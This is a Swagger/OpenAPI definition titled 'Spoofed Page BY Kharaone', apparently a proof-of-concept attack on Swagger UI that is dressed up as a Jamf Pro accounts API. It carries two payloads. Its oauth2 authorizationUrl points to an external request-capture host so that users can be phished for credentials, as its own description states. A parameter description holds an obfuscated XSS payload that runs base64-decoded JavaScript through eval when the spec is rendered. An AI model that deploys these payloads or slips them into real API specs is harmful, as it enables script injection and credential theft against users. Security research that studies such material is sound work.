swagger: '2.0'
components:
  securitySchemes:
    basicAuth:
      type: basic
    oAuthNoScopes:
        type: oauth2
        flows: 
          implicit: 
            authorizationUrl: https://eots2230hxrd70s.m.pipedream.net
            scopes: {}
security:
  - basicAuth: []
  - oAuthNoScopes: []
securityDefinitions:
  basicAuth:
    type: basic
  oAuthNoScopes:
      type: oauth2
      flows: 
        implicit: 
          authorizationUrl: https://eots2230hxrd70s.m.pipedream.net
          scopes: {}
info:
  title: Spoofed Page BY Kharaone
  description: |
    Attacker here could redirect the user to enter credentials on another page before continuing or hijack the authorize url as it's also part of the openapi definition.

  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
paths:
  /Kharaone:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - Kharaone_XSS_D
      operationId: findAccounts
      summary: Finds all accounts
  '/accounts/groupid/{id}':
    delete:
      parameters:
        - description: |
            <img src=x id='YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==' onerror='eval(atob(this.id))'>

          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: deleteGroupById
      summary: Deletes a group by id
    get:
      parameters:
        - description: Id value to filter by
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findGroupsById
      summary: Finds groups by id
    post:
      parameters:
        - description: Id value to filter by
          in: path
          name: id
          required: true
          type: string
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      description: 'You cannot create an LDAP group with a POST.  '
      operationId: createGroupById
      summary: Creates a new group by id
    put:
      parameters:
        - description: Id value to filter by
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      description: You cannot change information for an LDAP group with a PUT.
      operationId: updateGroupById
      summary: Updates an existing group by id
  '/accounts/groupname/{name}':
    get:
      parameters:
        - description: Name to filter by
          in: path
          name: name
          required: true
          type: string
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      description: 'You can PUT, POST, and DELETE using this resource URL.'
      operationId: findGroupsByName
      summary: Finds groups by name
definitions:
  '':
    properties:
      id:
        format: int64
        type: integer
      name:
        type: string
  Account:
    properties:
      id:
        format: int64
        type: integer
      name:
        type: string
  ActivationCode: {}

tags:
  - description: Operations on Jamf Pro accounts
    name: accounts
 
